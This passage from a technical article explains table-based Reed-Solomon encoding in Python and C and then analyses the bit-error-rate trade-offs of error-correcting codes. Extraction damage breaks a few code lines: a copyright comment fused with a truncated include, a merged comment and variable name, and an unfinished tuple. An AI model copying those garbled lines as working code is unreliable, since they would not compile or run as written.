65 b0 e5 04 44 69 fd b6 1a 4f c0 40: 66 67 1f 7c d0 7e d3 3a af 8d 92 ff a5 1c f5 66 41: 5d 6a 77 c1 94 af cd 32 0c cc bb 1a c7 2e d1 5d 42: 10 7d cf 1b 58 c1 ef 2a f4 0f c0 28 61 78 bd 10 43: 2b 70 a7 a6 1c 10 f1 22 57 4e e9 cd 03 4a 99 2b 44: 8a 53 a2 b2 dd 1d ab 1a 19 94 36 4c 30 d4 65 8a 45: b1 5e ca 0f 99 cc b5 12 ba d5 1f a9 52 e6 41 b1 46: fc 49 72 d5 55 a2 97 0a 42 16 64 9b f4 b0 2d fc 47: c7 44 1a 68 11 73 89 02 e1 57 4d 7e 96 82 09 c7 48: a3 0f 78 fd ca b8 23 7a de bf c7 84 92 91 c8 a3 49: 98 02 10 40 8e 69 3d 72 7d fe ee 61 f0 a3 ec 98 4a: d5 15 a8 9a 42 07 1f 6a 85 3d 95 53 56 f5 80 d5 4b: ee 18 c0 27 06 d6 01 62 26 7c bc b6 34 c7 a4 ee 4c: 4f 3b c5 33 c7 db 5b 5a 68 a6 63 37 07 59 58 4f 4d: 74 36 ad 8e 83 0a 45 52 cb e7 4a d2 65 6b 7c 74 4e: 39 21 15 54 4f 64 67 4a 33 24 31 e0 c3 3d 10 39 4f: 02 2c 7d e9 0b b5 79 42 90 65 18 05 a1 0f 34 02 50: f1 b7 d1 63 e4 ef 2e ba 4d e9 38 09 cb 1b 8f f1 51: ca ba b9 de a0 3e 30 b2 ee a8 11 ec a9 29 ab ca 52: 87 ad 01 04 6c 50 12 aa 16 6b 6a de 0f 7f c7 87 53: bc a0 69 b9 28 81 0c a2 b5 2a 43 3b 6d 4d e3 bc 54: 1d 83 6c ad e9 8c 56 9a fb f0 9c ba 5e d3 1f 1d 55: 26 8e 04 10 ad 5d 48 92 58 b1 b5 5f 3c e1 3b 26 56: 6b 99 bc ca 61 33 6a 8a a0 72 ce 6d 9a b7 57 6b 57: 50 94 d4 77 25 e2 74 82 03 33 e7 88 f8 85 73 50 58: 34 df b6 e2 fe 29 de fa 3c db 6d 72 fc 96 b2 34 59: 0f d2 de 5f ba f8 c0 f2 9f 9a 44 97 9e a4 96 0f 5a: 42 c5 66 85 76 96 e2 ea 67 59 3f a5 38 f2 fa 42 5b: 79 c8 0e 38 32 47 fc e2 c4 18 16 40 5a c0 de 79 5c: d8 eb 0b 2c f3 4a a6 da 8a c2 c9 c1 69 5e 22 d8 5d: e3 e6 63 91 b7 9b b8 d2 29 83 e0 24 0b 6c 06 e3 5e: ae f1 db 4b 7b f5 9a ca d1 40 9b 16 ad 3a 6a ae 5f: 95 fc b3 f6 3f 24 84 c2 72 01 b2 f3 cf 08 4e 95 60: 55 da 9e 42 b8 41 34 27 76 45 db 0e 79 12 01 55 61: 6e d7 f6 ff fc 90 2a 2f d5 04 f2 eb 1b 20 25 6e 62: 23 c0 4e 25 30 fe 08 37 2d c7 89 d9 bd 76 49 23 63: 18 cd 26 98 74 2f 16 3f 8e 86 a0 3c df 44 6d 18 64: b9 ee 23 8c b5 22 4c 07 c0 5c 7f bd ec da 91 b9 65: 82 e3 4b 31 f1 f3 52 0f 63 1d 56 58 8e e8 b5 82 66: cf f4 f3 eb 3d 9d 70 17 9b de 2d 6a 28 be d9 cf 67: f4 f9 9b 56 79 4c 6e 1f 38 9f 04 8f 4a 8c fd f4 68: 90 b2 f9 c3 a2 87 c4 67 07 77 8e 75 4e 9f 3c 90 69: ab bf 91 7e e6 56 da 6f a4 36 a7 90 2c ad 18 ab 6a: e6 a8 29 a4 2a 38 f8 77 5c f5 dc a2 8a fb 74 e6 6b: dd a5 41 19 6e e9 e6 7f ff b4 f5 47 e8 c9 50 dd 6c: 7c 86 44 0d af e4 bc 47 b1 6e 2a c6 db 57 ac 7c 6d: 47 8b 2c b0 eb 35 a2 4f 12 2f 03 23 b9 65 88 47 6e: 0a 9c 94 6a 27 5b 80 57 ea ec 78 11 1f 33 e4 0a 6f: 31 91 fc d7 63 8a 9e 5f 49 ad 51 f4 7d 01 c0 31 70: c2 0a 50 5d 8c d0 c9 a7 94 21 71 f8 17 15 7b c2 71: f9 07 38 e0 c8 01 d7 af 37 60 58 1d 75 27 5f f9 72: b4 10 80 3a 04 6f f5 b7 cf a3 23 2f d3 71 33 b4 73: 8f 1d e8 87 40 be eb bf 6c e2 0a ca b1 43 17 8f 74: 2e 3e ed 93 81 b3 b1 87 22 38 d5 4b 82 dd eb 2e 75: 15 33 85 2e c5 62 af 8f 81 79 fc ae e0 ef cf 15 76: 58 24 3d f4 09 0c 8d 97 79 ba 87 9c 46 b9 a3 58 77: 63 29 55 49 4d dd 93 9f da fb ae 79 24 8b 87 63 78: 07 62 37 dc 96 16 39 e7 e5 13 24 83 20 98 46 07 79: 3c 6f 5f 61 d2 c7 27 ef 46 52 0d 66 42 aa 62 3c 7a: 71 78 e7 bb 1e a9 05 f7 be 91 76 54 e4 fc 0e 71 7b: 4a 75 8f 06 5a 78 1b ff 1d d0 5f b1 86 ce 2a 4a 7c: eb 56 8a 12 9b 75 41 c7 53 0a 80 30 b5 50 d6 eb 7d: d0 5b e2 af df a4 5f cf f0 4b a9 d5 d7 62 f2 d0 7e: 9d 4c 5a 75 13 ca 7d d7 08 88 d2 e7 71 34 9e 9d 7f: a6 41 32 c8 57 1b 63 df ab c9 fb 02 13 06 ba a6 80: cc ce 3e f8 bd fc bb 74 43 07 39 e3 57 38 f7 cc 81: f7 c3 56 45 f9 2d a5 7c e0 46 10 06 35 0a d3 f7 82: ba d4 ee 9f 35 43 87 64 18 85 6b 34 93 5c bf ba 83: 81 d9 86 22 71 92 99 6c bb c4 42 d1 f1 6e 9b 81 84: 20 fa 83 36 b0 9f c3 54 f5 1e 9d 50 c2 f0 67 20 85: 1b f7 eb 8b f4 4e dd 5c 56 5f b4 b5 a0 c2 43 1b 86: 56 e0 53 51 38 20 ff 44 ae 9c cf 87 06 94 2f 56 87: 6d ed 3b ec 7c f1 e1 4c 0d dd e6 62 64 a6 0b 6d 88: 09 a6 59 79 a7 3a 4b 34 32 35 6c 98 60 b5 ca 09 89: 32 ab 31 c4 e3 eb 55 3c 91 74 45 7d 02 87 ee 32 8a: 7f bc 89 1e 2f 85 77 24 69 b7 3e 4f a4 d1 82 7f 8b: 44 b1 e1 a3 6b 54 69 2c ca f6 17 aa c6 e3 a6 44 8c: e5 92 e4 b7 aa 59 33 14 84 2c c8 2b f5 7d 5a e5 8d: de 9f 8c 0a ee 88 2d 1c 27 6d e1 ce 97 4f 7e de 8e: 93 88 34 d0 22 e6 0f 04 df ae 9a fc 31 19 12 93 8f: a8 85 5c 6d 66 37 11 0c 7c ef b3 19 53 2b 36 a8 90: 5b 1e f0 e7 89 6d 46 f4 a1 63 93 15 39 3f 8d 5b 91: 60 13 98 5a cd bc 58 fc 02 22 ba f0 5b 0d a9 60 92: 2d 04 20 80 01 d2 7a e4 fa e1 c1 c2 fd 5b c5 2d 93: 16 09 48 3d 45 03 64 ec 59 a0 e8 27 9f 69 e1 16 94: b7 2a 4d 29 84 0e 3e d4 17 7a 37 a6 ac f7 1d b7 95: 8c 27 25 94 c0 df 20 dc b4 3b 1e 43 ce c5 39 8c 96: c1 30 9d 4e 0c b1 02 c4 4c f8 65 71 68 93 55 c1 97: fa 3d f5 f3 48 60 1c cc ef b9 4c 94 0a a1 71 fa 98: 9e 76 97 66 93 ab b6 b4 d0 51 c6 6e 0e b2 b0 9e 99: a5 7b ff db d7 7a a8 bc 73 10 ef 8b 6c 80 94 a5 9a: e8 6c 47 01 1b 14 8a a4 8b d3 94 b9 ca d6 f8 e8 9b: d3 61 2f bc 5f c5 94 ac 28 92 bd 5c a8 e4 dc d3 9c: 72 42 2a a8 9e c8 ce 94 66 48 62 dd 9b 7a 20 72 9d: 49 4f 42 15 da 19 d0 9c c5 09 4b 38 f9 48 04 49 9e: 04 58 fa cf 16 77 f2 84 3d ca 30 0a 5f 1e 68 04 9f: 3f 55 92 72 52 a6 ec 8c 9e 8b 19 ef 3d 2c 4c 3f a0: ff 73 bf c6 d5 c3 5c 69 9a cf 70 12 8b 36 03 ff a1: c4 7e d7 7b 91 12 42 61 39 8e 59 f7 e9 04 27 c4 a2: 89 69 6f a1 5d 7c 60 79 c1 4d 22 c5 4f 52 4b 89 a3: b2 64 07 1c 19 ad 7e 71 62 0c 0b 20 2d 60 6f b2 a4: 13 47 02 08 d8 a0 24 49 2c d6 d4 a1 1e fe 93 13 a5: 28 4a 6a b5 9c 71 3a 41 8f 97 fd 44 7c cc b7 28 a6: 65 5d d2 6f 50 1f 18 59 77 54 86 76 da 9a db 65 a7: 5e 50 ba d2 14 ce 06 51 d4 15 af 93 b8 a8 ff 5e a8: 3a 1b d8 47 cf 05 ac 29 eb fd 25 69 bc bb 3e 3a a9: 01 16 b0 fa 8b d4 b2 21 48 bc 0c 8c de 89 1a 01 aa: 4c 01 08 20 47 ba 90 39 b0 7f 77 be 78 df 76 4c ab: 77 0c 60 9d 03 6b 8e 31 13 3e 5e 5b 1a ed 52 77 ac: d6 2f 65 89 c2 66 d4 09 5d e4 81 da 29 73 ae d6 ad: ed 22 0d 34 86 b7 ca 01 fe a5 a8 3f 4b 41 8a ed ae: a0 35 b5 ee 4a d9 e8 19 06 66 d3 0d ed 17 e6 a0 af: 9b 38 dd 53 0e 08 f6 11 a5 27 fa e8 8f 25 c2 9b b0: 68 a3 71 d9 e1 52 a1 e9 78 ab da e4 e5 31 79 68 b1: 53 ae 19 64 a5 83 bf e1 db ea f3 01 87 03 5d 53 b2: 1e b9 a1 be 69 ed 9d f9 23 29 88 33 21 55 31 1e b3: 25 b4 c9 03 2d 3c 83 f1 80 68 a1 d6 43 67 15 25 b4: 84 97 cc 17 ec 31 d9 c9 ce b2 7e 57 70 f9 e9 84 b5: bf 9a a4 aa a8 e0 c7 c1 6d f3 57 b2 12 cb cd bf b6: f2 8d 1c 70 64 8e e5 d9 95 30 2c 80 b4 9d a1 f2 b7: c9 80 74 cd 20 5f fb d1 36 71 05 65 d6 af 85 c9 b8: ad cb 16 58 fb 94 51 a9 09 99 8f 9f d2 bc 44 ad b9: 96 c6 7e e5 bf 45 4f a1 aa d8 a6 7a b0 8e 60 96 ba: db d1 c6 3f 73 2b 6d b9 52 1b dd 48 16 d8 0c db bb: e0 dc ae 82 37 fa 73 b1 f1 5a f4 ad 74 ea 28 e0 bc: 41 ff ab 96 f6 f7 29 89 bf 80 2b 2c 47 74 d4 41 bd: 7a f2 c3 2b b2 26 37 81 1c c1 02 c9 25 46 f0 7a be: 37 e5 7b f1 7e 48 15 99 e4 02 79 fb 83 10 9c 37 bf: 0c e8 13 4c 3a 99 0b 91 47 43 50 1e e1 22 b8 0c c0: aa a9 21 84 6d 82 68 4e ec 8a ab 1c f2 24 02 aa c1: 91 a4 49 39 29 53 76 46 4f cb 82 f9 90 16 26 91 c2: dc b3 f1 e3 e5 3d 54 5e b7 08 f9 cb 36 40 4a dc c3: e7 be 99 5e a1 ec 4a 56 14 49 d0 2e 54 72 6e e7 c4: 46 9d 9c 4a 60 e1 10 6e 5a 93 0f af 67 ec 92 46 c5: 7d 90 f4 f7 24 30 0e 66 f9 d2 26 4a 05 de b6 7d c6: 30 87 4c 2d e8 5e 2c 7e 01 11 5d 78 a3 88 da 30 c7: 0b 8a 24 90 ac 8f 32 76 a2 50 74 9d c1 ba fe 0b c8: 6f c1 46 05 77 44 98 0e 9d b8 fe 67 c5 a9 3f 6f c9: 54 cc 2e b8 33 95 86 06 3e f9 d7 82 a7 9b 1b 54 ca: 19 db 96 62 ff fb a4 1e c6 3a ac b0 01 cd 77 19 cb: 22 d6 fe df bb 2a ba 16 65 7b 85 55 63 ff 53 22 cc: 83 f5 fb cb 7a 27 e0 2e 2b a1 5a d4 50 61 af 83 cd: b8 f8 93 76 3e f6 fe 26 88 e0 73 31 32 53 8b b8 ce: f5 ef 2b ac f2 98 dc 3e 70 23 08 03 94 05 e7 f5 cf: ce e2 43 11 b6 49 c2 36 d3 62 21 e6 f6 37 c3 ce d0: 3d 79 ef 9b 59 13 95 ce 0e ee 01 ea 9c 23 78 3d d1: 06 74 87 26 1d c2 8b c6 ad af 28 0f fe 11 5c 06 d2: 4b 63 3f fc d1 ac a9 de 55 6c 53 3d 58 47 30 4b d3: 70 6e 57 41 95 7d b7 d6 f6 2d 7a d8 3a 75 14 70 d4: d1 4d 52 55 54 70 ed ee b8 f7 a5 59 09 eb e8 d1 d5: ea 40 3a e8 10 a1 f3 e6 1b b6 8c bc 6b d9 cc ea d6: a7 57 82 32 dc cf d1 fe e3 75 f7 8e cd 8f a0 a7 d7: 9c 5a ea 8f 98 1e cf f6 40 34 de 6b af bd 84 9c d8: f8 11 88 1a 43 d5 65 8e 7f dc 54 91 ab ae 45 f8 d9: c3 1c e0 a7 07 04 7b 86 dc 9d 7d 74 c9 9c 61 c3 da: 8e 0b 58 7d cb 6a 59 9e 24 5e 06 46 6f ca 0d 8e db: b5 06 30 c0 8f bb 47 96 87 1f 2f a3 0d f8 29 b5 dc: 14 25 35 d4 4e b6 1d ae c9 c5 f0 22 3e 66 d5 14 dd: 2f 28 5d 69 0a 67 03 a6 6a 84 d9 c7 5c 54 f1 2f de: 62 3f e5 b3 c6 09 21 be 92 47 a2 f5 fa 02 9d 62 df: 59 32 8d 0e 82 d8 3f b6 31 06 8b 10 98 30 b9 59 e0: 99 14 a0 ba 05 bd 8f 53 35 42 e2 ed 2e 2a f6 99 e1: a2 19 c8 07 41 6c 91 5b 96 03 cb 08 4c 18 d2 a2 e2: ef 0e 70 dd 8d 02 b3 43 6e c0 b0 3a ea 4e be ef e3: d4 03 18 60 c9 d3 ad 4b cd 81 99 df 88 7c 9a d4 e4: 75 20 1d 74 08 de f7 73 83 5b 46 5e bb e2 66 75 e5: 4e 2d 75 c9 4c 0f e9 7b 20 1a 6f bb d9 d0 42 4e e6: 03 3a cd 13 80 61 cb 63 d8 d9 14 89 7f 86 2e 03 e7: 38 37 a5 ae c4 b0 d5 6b 7b 98 3d 6c 1d b4 0a 38 e8: 5c 7c c7 3b 1f 7b 7f 13 44 70 b7 96 19 a7 cb 5c e9: 67 71 af 86 5b aa 61 1b e7 31 9e 73 7b 95 ef 67 ea: 2a 66 17 5c 97 c4 43 03 1f f2 e5 41 dd c3 83 2a eb: 11 6b 7f e1 d3 15 5d 0b bc b3 cc a4 bf f1 a7 11 ec: b0 48 7a f5 12 18 07 33 f2 69 13 25 8c 6f 5b b0 ed: 8b 45 12 48 56 c9 19 3b 51 28 3a c0 ee 5d 7f 8b ee: c6 52 aa 92 9a a7 3b 23 a9 eb 41 f2 48 0b 13 c6 ef: fd 5f c2 2f de 76 25 2b 0a aa 68 17 2a 39 37 fd f0: 0e c4 6e a5 31 2c 72 d3 d7 26 48 1b 40 2d 8c 0e f1: 35 c9 06 18 75 fd 6c db 74 67 61 fe 22 1f a8 35 f2: 78 de be c2 b9 93 4e c3 8c a4 1a cc 84 49 c4 78 f3: 43 d3 d6 7f fd 42 50 cb 2f e5 33 29 e6 7b e0 43 f4: e2 f0 d3 6b 3c 4f 0a f3 61 3f ec a8 d5 e5 1c e2 f5: d9 fd bb d6 78 9e 14 fb c2 7e c5 4d b7 d7 38 d9 f6: 94 ea 03 0c b4 f0 36 e3 3a bd be 7f 11 81 54 94 f7: af e7 6b b1 f0 21 28 eb 99 fc 97 9a 73 b3 70 af f8: cb ac 09 24 2b ea 82 93 a6 14 1d 60 77 a0 b1 cb f9: f0 a1 61 99 6f 3b 9c 9b 05 55 34 85 15 92 95 f0 fa: bd b6 d9 43 a3 55 be 83 fd 96 4f b7 b3 c4 f9 bd fb: 86 bb b1 fe e7 84 a0 8b 5e d7 66 52 d1 f6 dd 86 fc: 27 98 b4 ea 26 89 fa b3 10 0d b9 d3 e2 68 21 27 fd: 1c 95 dc 57 62 58 e4 bb b3 4c 90 36 80 5a 05 1c fe: 51 82 64 8d ae 36 c6 a3 4b 8f eb 04 26 0c 69 51 ff: 6a 8f 0c 30 ea e7 d8 ab e8 ce c2 e1 44 3e 4d 6a
print rsencode_lfsr2(table, msg,
Alternatively, if none of the generating polynomial’s coefficients are zero, we can just represent these coefficients as powers of a generating element of a field, and then store log and antilog tables of \( x^n \) in the symbol field. These are each a smaller table of length 256 (with one dummy entry) and they remove all dependencies on doing arithmetic in the symbol field.
def rsencode_lfsr3_table(field_polynomial): """ Create log and antilog tables for Reed-Solomon encoding using a field This just uses powers of x^n. """ log = [0] * 256 antilog = [0] * 256 c = 1 for k in xrange(255): antilog[k] = c log[c] = k c <<= 1 cxor = c ^ field_polynomial if cxor < c: c = cxor return log, antilog def rsencode_lfsr3(log, antilog, gpowers, message, remainder_only=False): """ encode a message in Reed-Solomon using LFSR log, antilog: tables for log and antilog: log[x^i] = i, antilog[i] = x^i gpowers: generator polynomial coefficients x^i, represented as i, in descending order message: string of bytes remainder_only: whether to return the remainder only """ glength = len(gpowers) remainder = [0]*glength for char in message + '\0'*glength: out = remainder[0] if out == 0: # No multiplication. Just shift. for k in xrange(glength-1): remainder[k] = remainder[k+1] remainder[glength-1] = ord(char) else: outp = log[out] for k in xrange(glength-1): j = gpowers[k] + outp if j >= 255: j -= 255 remainder[k] = remainder[k+1] ^ antilog[j] j = gpowers[glength-1] + outp if j >= 255: j -= 255 remainder[glength-1] = ord(char) ^ antilog[j] remainder = ''.join(chr(b) for b in remainder) return remainder if remainder_only else message+remainder log, antilog = rsencode_lfsr3_table(f256.coeffs) for (name, table) in [('log',log),('antilog',antilog)]: print "%s:" % name for k in xrange(0,256,16): print "%03d-%03d: %s" % (k,k+15, ' '.join('%02x' % c for c in table[k:k+16]))
log: 000-015: 00 00 01 19 02 32 1a c6 03 df 33 ee 1b 68 c7 4b 016-031: 04 64 e0 0e 34 8d ef 81 1c c1 69 f8 c8 08 4c 71 032-047: 05 8a 65 2f e1 24 0f 21 35 93 8e da f0 12 82 45 048-063: 1d b5 c2 7d 6a 27 f9 b9 c9 9a 09 78 4d e4 72 a6 064-079: 06 bf 8b 62 66 dd 30 fd e2 98 25 b3 10 91 22 88 080-095: 36 d0 94 ce 8f 96 db bd f1 d2 13 5c 83 38 46 40 096-111: 1e 42 b6 a3 c3 48 7e 6e 6b 3a 28 54 fa 85 ba 3d 112-127: ca 5e 9b 9f 0a 15 79 2b 4e d4 e5 ac 73 f3 a7 57 128-143: 07 70 c0 f7 8c 80 63 0d 67 4a de ed 31 c5 fe 18 144-159: e3 a5 99 77 26 b8 b4 7c 11 44 92 d9 23 20 89 2e 160-175: 37 3f d1 5b 95 bc cf cd 90 87 97 b2 dc fc be 61 176-191: f2 56 d3 ab 14 2a 5d 9e 84 3c 39 53 47 6d 41 a2 192-207: 1f 2d 43 d8 b7 7b a4 76 c4 17 49 ec 7f 0c 6f f6 208-223: 6c a1 3b 52 29 9d 55 aa fb 60 86 b1 bb cc 3e 5a 224-239: cb 59 5f b0 9c a9 a0 51 0b f5 16 eb 7a 75 2c d7 240-255: 4f ae d5 e9 e6 e7 ad e8 74 d6 f4 ea a8 50 58 af antilog: 000-015: 01 02 04 08 10 20 40 80 1d 3a 74 e8 cd 87 13 26 016-031: 4c 98 2d 5a b4 75 ea c9 8f 03 06 0c 18 30 60 c0 032-047: 9d 27 4e 9c 25 4a 94 35 6a d4 b5 77 ee c1 9f 23 048-063: 46 8c 05 0a 14 28 50 a0 5d ba 69 d2 b9 6f de a1 064-079: 5f be 61 c2 99 2f 5e bc 65 ca 89 0f 1e 3c 78 f0 080-095: fd e7 d3 bb 6b d6 b1 7f fe e1 df a3 5b b6 71 e2 096-111: d9 af 43 86 11 22 44 88 0d 1a 34 68 d0 bd 67 ce 112-127: 81 1f 3e 7c f8 ed c7 93 3b 76 ec c5 97 33 66 cc 128-143: 85 17 2e 5c b8 6d da a9 4f 9e 21 42 84 15 2a 54 144-159: a8 4d 9a 29 52 a4 55 aa 49 92 39 72 e4 d5 b7 73 160-175: e6 d1 bf 63 c6 91 3f 7e fc e5 d7 b3 7b f6 f1 ff 176-191: e3 db ab 4b 96 31 62 c4 95 37 6e dc a5 57 ae 41 192-207: 82 19 32 64 c8 8d 07 0e 1c 38 70 e0 dd a7 53 a6 208-223: 51 a2 59 b2 79 f2 f9 ef c3 9b 2b 56 ac 45 8a 09 224-239: 12 24 48 90 3d 7a f4 f5 f7 f3 fb eb cb 8b 0b 16 240-255: 2c 58 b0 7d fa e9 cf 83 1b 36 6c d8 ad 47 8e 00
gpowers = [log[c] for c in g[-2::-1]] print "generator polynomial coefficient indices: ", gpowers print "remainder:" print rsencode_lfsr3(log, antilog, gpowers, msg, remainder_only=True).encode('hex') print "calculated earlier:" print remainder.encode('hex')
generator polynomial coefficient indices: [120, 104, 107, 109, 102, 161, 76, 3, 91, 191, 147, 169, 182, 194, 225, 120] remainder: 552ca3b464003a52c45011f46e0fea9b calculated earlier: 552ca3b464003a52c45011f46e0fea9b
There. It’s very simple; the hardest thing here is making sure you get the coefficients in the right order. You wouldn’t want to get those the wrong way around.
C Implementation
I tested a C implementation using XC16 and the MPLAB X debugger:
""" C code for reed-solomon.c: /* * * Copyright 2018 Jason M. Sachint.h> #include <stddef.h> #include <string.h> /** * Reed-Solomon log-table-based implementation */ typedef struct { uint8_t log[256]; uint8_t antilog[256]; uint8_t symbol_polynomial; const uint8_t *gpowers; uint8_t generator_degree; } rslogtable_t; /** * Initialize log table * * @param ptables - points to log tables * @param symbol_polynomial: lower 8 bits of symbol polynomial * (for example, 0x1d for 0x11d = x^8 + x^4 + x^3 + x^2 + 1 * @param gpowers - points to generator polynomial coefficients, * except for the leading monomial, * in descending order, expressed as powers of x in the symbol field. * This requires all generator polynomial coefficients to be nonzero. * @param generator_degree - degree of the generator polynomial, * which is also the length of the gpowers array. */ void rslogtable_init( rslogtable_t *ptables, uint8_t symbol_polynomial, const uint8_t *gpowers, uint8_t generator_degree ) { ptables->symbol_polynomial = symbol_polynomial; ptables->gpowers = gpowers; ptables->generator_degree = generator_degree; int k; uint8_t c = 1; for (k = 0; k < 255; ++k) { ptables->antilog[k] = c; ptables->log[c] = k; if (c >> 7) { c <<= 1; c ^= symbol_polynomial; } else { c <<= 1; } } ptables->log[0] = 0; ptables->antilog[255] = 0; } /** * Encode a message * * @param ptables - pointer to table-based lookup info * @param pmessage - message to be encoded * @param message_length - length of the message * @param premainder - buffer which will be filled in with the remainder. * This must have a size equal to ptables->generator_degree */ void rslogtable_encode( const rslogtable_t *ptables, const uint8_t *pmessage, size_t message_length, uint8_t *premainder ) { int i, j, k, n; int highbyte; const int t2 = ptables->generator_degree; const int lastindex = t2-1; // Zero out the remainder for (i = 0; i < t2; ++i) { premainder[i] = 0; } n = message_length + t2; for (i = 0; i < n; ++i) { uint8_t c = (i < message_length) ? pmessage[i] : 0; highbyte = premainder[0]; if (highbyte == 0) { // No multiplication, just a simple shift for (k = 0; k < lastindex; ++k) { premainder[k] = premainder[k+1]; } premainder[lastindex] = c; } else { uint8_t log_highbyte = ptables->log[highbyte]; for (k = 0; k < lastindex; ++k) { j = ptables->gpowers[k] + (int)log_highbyte; if (j >= 255) j -= 255; premainder[k] = premainder[k+1] ^ ptables->antilog[j]; } j = ptables->gpowers[lastindex] + (int)log_highbyte; if (j >= 255) j -= 255; premainder[lastindex] = c ^ ptables->antilog[j]; } } } uint8_t rsremainder[16]; void rslogtable_test(void) { const uint8_t gpowers[] = { 120, 104, 107, 109, 102, 161, 76, 3, 91, 191, 147, 169, 182, 194, 225, 120 }; rslogtable_t rsinfo; rslogtable_init(&rsinfo, 0x1d, gpowers, 16); const char message[] = "Ernie, you have a banana in your ear!"; rslogtable_encode(&rsinfo, (const uint8_t *)message, strlen(message), rsremainder); __builtin_nop(); } """;
It worked as expected:
Again, this is only the encoder, but remember the asymmetry here:
- encoder = cheap resource-limited processor
- decoder = desktop PC CPU
And we can still do error correction!
Is It Worth It?
Is encoding worth the effort?
Wait. We got all the way through Part XV and well into this article, you say, and he’s asking is it worth it?!
Yes, that’s the question. We got a benefit, namely the ability to detect and sometimes even correct errors, but it has a cost. We have to send extra information, and that uses up part of the available communications bandwidth. And we had to add some complexity. Is it a net gain?
There are at least two ways of looking at this cost-benefit tradeoff, and it depends on what the constraints are.
The first way of analyzing cost-benefits is to consider a situation where we’re given a transmitter/receiver pair, and all we have control over is the digital part of the system that handles the bits that are sent. Error correcting codes like Reed-Solomon give us the ability to lower the error rate substantially — and we’ll calculate this in just a minute — with only a slight decrease in transmission rate. A \( (255, 239) \) Reed-Solomon code lets us correct up to 8 errors in each block of 255 bytes, with 93.7% of the transmission capacity of the uncoded channel. The encoding complexity cost is minimal, and the decoding cost is small enough to merit use of Reed-Solomon decoders in higher-end embedded systems or in desktop computers.
The second way of analyzing cost-benefits is to consider a situation where we have control over the transmitter energy, as well as the digital encoding/decoding mechanisms. We can lower the error rate by using an error-correcting code, or we can increase the transmitter energy to improve the signal-to-noise ratio. The Shannon-Hartley theorem, which says channel capacity \( C \leq B \log_2 (1+\frac{S}{N}) \), can help us quantitatively compare those possibilities. The standard metric is \( E_b/N_0 \) in decibels, so let’s try to frame things in terms of it. First we have to understand what it is.
One common assumption in communications is an additive Gaussian white noise (AWGN) channel, which has some amount of noise \( N_0 \) per unit bandwidth. This is why oscilloscopes let you limit the bandwidth; if you don’t need it, it reduces the noise level. In any case, if we have an integrate-and-dump receiver, where we integrate our received signal, and every \( T \) seconds we sample the integrator value, divide by \( T \) to compute an average value over the interval, and reset the integrator, then the received noise can be modeled as a Gaussian random variable with zero mean and variance of \( \sigma_N^2 = \frac{N_0}{2T} \). (This can be computed from \( \sigma_N^2 = \frac{N_0}{2}\int_{-\infty}^{\infty}\left|h(t)\right|^2\, dt \) with \( h(t) \) of the integrate-and-dump filter being a unit rectangular pulse of duration \( T \) and height \( 1/T \).)
The signal waveform has some energy \( E_b \) per bit. Consider a raw binary pulse signal \( x(t) = \pm A \) for a duration of \( T \) seconds for each bit, with \( +A \) representing a binary
1 and \( -A \) representing a binary
0. If we compute \( E_b = \int_{-\infty}^{\infty}\left|x(t)\right|^2\, dt \) we get \( E_b = A^2T \). The integrate-and-dump receiver outputs a
1 if its output sample is positive, and
0 if its output sample is negative. We get a bit flip if the received noise is less than \( -A \) for a transmitted
1 bit, or greater than \( A \) for a transmitted
0 bit. This probability is just the Q-function evaluated at \( Q(A/\sigma_n) = Q(\sqrt{A^2/\sigma_n{}^2}) = Q(\sqrt{(E_b/T)/(N_0/2T)}) = Q(\sqrt{2E_b/N_0}). \)
In other words, if we know how bits are represented as signals, we can determine the probability of a bit error just by knowing what \( E_b/N_0 \) is.
Let’s graph it!
Bit Error Rate Calculations Are the Bane of My Existence
Just one quick aside: this section showing bit error rate graphs was a beastly thing to manage. Don’t worry about the Python code, or how the calculations work, unless you want to enter this quagmire. Otherwise, just look at the pretty pictures, and my descriptions of how to interpret them.
As I was saying, let’s graph it!
import numpy as np import pandas as pd import matplotlib.pyplot as plt %matplotlib inline import scipy.stats def Q(x): return scipy.stats.norm.cdf(-x) def Qinv(x): return -scipy.stats.norm.ppf(x) ebno_db = np.arange(-6,12,0.01) ebno = 10**(ebno_db/10) # Decibels are often confusing. # dB = 10 log10 x if x is measured in energy # dB = 20 log10 x if x is measured in amplitude. plt.semilogy(ebno_db, Q(np.sqrt(2*ebno))) plt.ylabel('Bit error rate',fontsize=12) plt.xlabel('$E_b/N_0$ (dB)',fontsize=12) plt.grid('on') plt.title('Bit error rate for raw binary pulses in AWGN channel\n' +'with integrate-and-dump receiver');
If we have a nice healthy noise margin of 12dB for \( E_b/N_0 \), then the bit error rate is \( 9.0\times 10^{-9} \), or one error in 110 million. Again, this is just raw binary pulses using an integrate-and-dump receiver. More complex signal shaping techniques like quadrature amplitude modulation can make better use of available spectrum. But that’s an article for someone else to write.
With an \( E_b/N_0 \) ratio of 1 (that’s 0dB), probability of a bit error is around 0.079, or about one in 12. Lousy. You want a lower error rate? Put more energy into the signal, or make sure there’s less energy in noise.
Okay, now suppose we use a Hamming (7,4) code. Let’s say, for example, that the raw bit error rate is 0.01, which occurs at about \( E_b/N_0 \approx 4.3 \)dB. With the Hamming (7,4) code, we can correct one error, so there are a few cases to consider for an upper bound that is conservative and assumes some worst-case conditions:
- There were no received bit errors. Probability of this is \( (1-0.01)^7 \approx 0.932065. \) The receiver will output 4 correct output bits, and there are no errors after decoding
- There was one received bit error, in one of the seven codeword bits. Probability of this is \( 7\cdot 0.01\cdot(1-0.01)^6 \approx 0.065904. \) The receiver will output 4 correct output bits, and there are no errors after decoding.
- There are two or more received bit errors. Probability of this is \( \approx 0.002031 \). We don’t know how many correct output bits the receiver will produce; a true analysis is complicated. Let’s just assume, as a worst-case estimate, we’ll receive no correct output bits, so there are 4 errors after decoding.
In this case the expected number of errors (worst-case) in the output bits is 4 × 0.002031, or 0.002031 per output bit.
We went from a bit error rate of 0.01 down to about 0.002031, which is good, right? The only drawback is that to send data 4 bits we had to transmit 7 bits, so the transmitted energy per bit is a factor of 7/4 higher.
We can find the expected number of errors more precisely if we look at the received error count for each combination of the 128 possible error patterns, and compute the “weighted count” W as the sum of the received error counts, weighted by the number of patterns that cause that combination of raw and received error count:
# stuff from Part X_stats = (H74_table .groupby(['raw_error_count','received_error_count']) .agg({'pattern': 'count'}) .rename(columns={'pattern':'count'})) H74_stats
H74a = H74_stats.reset_index() H74b_data = [ ('raw_error_count',H74a['raw_error_count']), ('weighted_count',) ] H74b = ((H74a['received_error_count']*H74a['count']) .groupby(H74a['raw_error_count']) .agg({'weighted_count':'sum'})) H74b
